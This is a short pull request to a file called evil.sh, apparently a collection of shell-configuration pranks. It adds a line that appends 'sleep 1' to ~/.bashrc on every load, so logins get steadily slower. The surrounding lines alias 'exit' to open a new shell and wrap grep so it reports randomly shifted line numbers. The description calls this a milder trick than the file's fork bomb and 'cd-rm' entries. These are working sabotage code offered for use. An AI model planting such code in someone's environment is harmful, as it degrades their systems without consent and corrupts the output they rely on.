### PR TITLE
Add a sleep 1 each time we source .bashrc

### DIFF
--- a/evil.sh
+++ b/evil.sh
@@ -42,3 +42,6 @@ alias exit='sh'
 
 # Add a random number to line numbers when using `grep -n`
 function grep { command grep "$@" | awk -F: '{ r = int(rand() * 10); n = $1; $1 = ""; if (n ~ /^[0-9]+$/) { o = n+r } else { o = n }; print o ":" substr($0, 2)}'; }
+
+# Take longer and longer to SSH to the box
+sleep 1 && echo sleep 1 >> ~/.bashrc


### PR DESCRIPTION
This is a nice evil-ish thing to do, a lot less harmful than the cd-rm or the fork bomb. Could probably be done in a more elegant manner but I love this innocent trick.
